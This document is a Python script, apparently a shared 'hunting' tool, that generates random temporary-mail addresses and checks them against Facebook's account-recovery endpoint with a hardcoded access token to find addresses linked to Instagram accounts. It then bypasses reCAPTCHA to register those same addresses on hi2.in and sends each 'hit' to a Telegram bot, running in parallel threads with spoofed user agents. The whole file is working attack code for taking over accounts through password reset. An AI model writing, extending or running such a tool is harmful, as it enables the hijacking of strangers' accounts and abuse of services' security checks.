import requests
import re
import base64
import time
import os
import threading
import random
import sys
from datetime import datetime

# تنظيف الشاشة وتثبيت المكتبات
def setup():
    os.system('cls' if os.name == 'nt' else 'clear')
    try:
        import httpx
        from user_agent import generate_user_agent
    except ImportError:
        print(" [!] Installing dependencies...")
        os.system("pip install httpx httpx[http2] user_agent requests")
        print(" [!] Dependencies installed. Restarting...")
        time.sleep(2)
        os.execl(sys.executable, sys.executable, *sys.argv)

setup()
import httpx
from user_agent import generate_user_agent

# --- معلومات المطور ---
DEVELOPER = "MOHA AL-SHALFAWI"
USERNAME = "mouhamed20888"
TOOL_NAME = "MOHA-02 SYSTEM"

# --- المتغيرات العالمية ---
hit = 0
bad_ig = 0
bad_mail = 0
total_checked = 0
lock = threading.Lock()

# --- واجهة المستخدم (LOGO) ---
def logo():
    os.system('cls' if os.name == 'nt' else 'clear')
    print(f"""
\033[1;32m      
 ███▄           ▄███      ▒█████      ██░ ██      ▄▄▄      
 ██▀██         ██▀██     ▒██▒  ██▒   ▓██░ ██     ▒████▄    
 ▓██ ▀█       █▀ ▓██     ▒██░  ██▒   ▒██▀▀██     ▒██  ▀█▄  
 ▓██  ▀█     █▀  ▓██     ▒██   ██░   ░▓█ ░██     ░██▄▄▄▄██ 
 ▒██▒  ▀█   █▀   ▒██▒    ░ ████▓▒░   ░▓█▒░██▓     ▓█   ▓██▒
 ▒ ░▒   ░  ░     ░ ▒░    ░ ▒░▒░▒░     ▒ ░░▒░▒     ▒▒   ▓▒█░
 ░  ░      ░     ░  ░      ░ ▒ ▒░     ▒ ░▒░ ░      ▒   ▒▒ ░
 ░      ░  ░     ░       ░ ░ ░ ▒      ░  ░░ ░      ░   ▒   
        ░        ░           ░ ░      ░  ░  ░          ░  ░
                                                           
    \033[1;37m--------------------------------------------------
    \033[1;33m DEVELOPER : \033[1;36m{DEVELOPER}
    \033[1;33m USERNAME  : \033[1;36m{USERNAME}
    \033[1;37m--------------------------------------------------
    \033[1;31m [!] ATENTION: REAL HUNTING SYSTEM ACTIVATED
    \033[1;37m--------------------------------------------------
    """)

# --- إدخال البيانات ---
logo()
token = input('\033[1;32m [?] Enter Telegram Bot Token : ')
ID = input('\033[1;32m [?] Enter Telegram ID : ')

# --- المحرك الأساسي للفحص ---
def check_email_availability(email):
    """يفحص إذا كان البريد متاحاً للإنشاء على hi2.in"""
    global hit, bad_mail
    siteKey = '6LfEUPkgAAAAAKTgbMoewQkWBEQhO2VPL4QviKct'
    siteUrl = 'https://hi2.in/'
    userAgent = generate_user_agent()

    try:
        session = requests.Session()
        site_html = session.get(siteUrl, timeout=10).text
        
        # استخراج recaptcha v
        try:
            renderUrl = re.findall(r"""'"['"]""", site_html)[0]
        except:
            renderUrl = 'https://www.google.com/recaptcha/api2/recaptcha__en.js'

        js = session.get(renderUrl).text
        match = re.search(r"po.src\s*=\s*'(https://[^']+)';", js)
        v = match.group(1).split('/')[5] if match else renderUrl.split('/')[5]
        api = 'https://www.google.com/recaptcha/api2'

        co = base64.b64encode(b'https://hi2.in:443').decode().replace('=', '.')
        
        anchor = session.get(f'{api}/anchor', params={
            'ar': '1', 'k': siteKey, 'co': co, 'hl': 'en', 'v': v, 'size': 'invisible', 'cb': 'abc123'
        }).text
        
        re_token = anchor.split('recaptcha-token" value="')[1].split('"')[0]
        
        reload = session.post(f'{api}/reload?k={siteKey}', data={
            'v': v, 'co': co, 'reason': 'q', 'size': 'invisible', 'hl': 'en', 'k': siteKey, 'c': re_token
        }).text
        
        final_token = reload.split('"rresp","')[1].split('"')[0]
        
        prefix, domain = email.split('@')
        
        res = session.post('https://hi2.in/api/custom', data={
            'domain': domain, 'prefix': prefix, 'recaptcha': final_token
        }, headers={'User-Agent': userAgent})

        if "hash" in res.text:
            with lock: hit += 1
            send_to_telegram(email)
            return True
        else:
            with lock: bad_mail += 1
            return False
            
    except Exception:
        return False

def send_to_telegram(email):
    """إرسال الصيد الناجح إلى التلجرام"""
    now = datetime.now().strftime("%H:%M:%S")
    msg = f"""
✅ MOHA AL-SHALFAWI BROUGHT YOU A HIT!
━━━━━━━━━━━━━━━━━━
📧 Email: {email}
🔗 Platform: Instagram Linked
⏰ Time: {now}
━━━━━━━━━━━━━━━━━━
Dev: @{USERNAME}
"""
    try:
        url = f"https://api.telegram.org/bot{token}/sendMessage"
        requests.post(url, data={"chat_id": ID, "text": msg})
    except:
        pass

def check_instagram_link(email):
    """المحرك الأساسي لفحص ارتباط البريد بإنستجرام"""
    global bad_ig, total_checked
    
    url = 'https://b-graph.facebook.com/recover_accounts'
    headers = {
        'Host': 'b-graph.facebook.com',
        'User-Agent': generate_user_agent(),
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    
    data = (f"q={email}&friend_name=&qs=&summary=true&device_id={random.randint(1111,9999)}"
            f"&src=fb4a_account_recovery&access_token=350685531728%7C62f8ce9f74b12f84c123cc23437a4a32")

    try:
        resp = requests.post(url, headers=headers, data=data, timeout=10)
        with lock: total_checked += 1
        
        if "network_info" in resp.text:
            # إذا وجد الحساب، ننتقل لفحص إتاحية البريد
            is_available = check_email_availability(email)
            if is_available:
                print(f"\033[1;32m [HIT] {email} | Linked & Available")
            else:
                print(f"\033[1;33m [TAKEN] {email} | Linked but Mail Taken")
        else:
            with lock: bad_ig += 1
            # تحديث السطر الحالي في الكونسول
            sys.stdout.write(f"\r\033[1;37m [ Checked: {total_checked} | Hits: {hit} | Bad IG: {bad_ig} ]")
            sys.stdout.flush()
            
    except Exception:
        pass

def generator():
    """توليد بريد إلكتروني عشوائي"""
    domains = ['hi2.in', 'telegmail.com']
    letters = "abcdefghijklmnopqrstuvwxyz0123456789"
    while True:
        prefix = "".join(random.choice(letters) for _ in range(random.randint(5, 8)))
        email = f"{prefix}@{random.choice(domains)}"
        check_instagram_link(email)

def start_threads():
    """بدء التشغيل المتعدد"""
    threads_count = 15
    print(f"\n\033[1;36m [*] Starting {threads_count} Threads... \n")
    threads = []
    for _ in range(threads_count):
        t = threading.Thread(target=generator)
        t.daemon = True
        threads.append(t)
        t.start()
    
    for t in threads:
        t.join()

if __name__ == "__main__":
    try:
        start_threads()
    except KeyboardInterrupt:
        print("\n\033[1;31m [!] Stopped by User.")
        sys.exit()
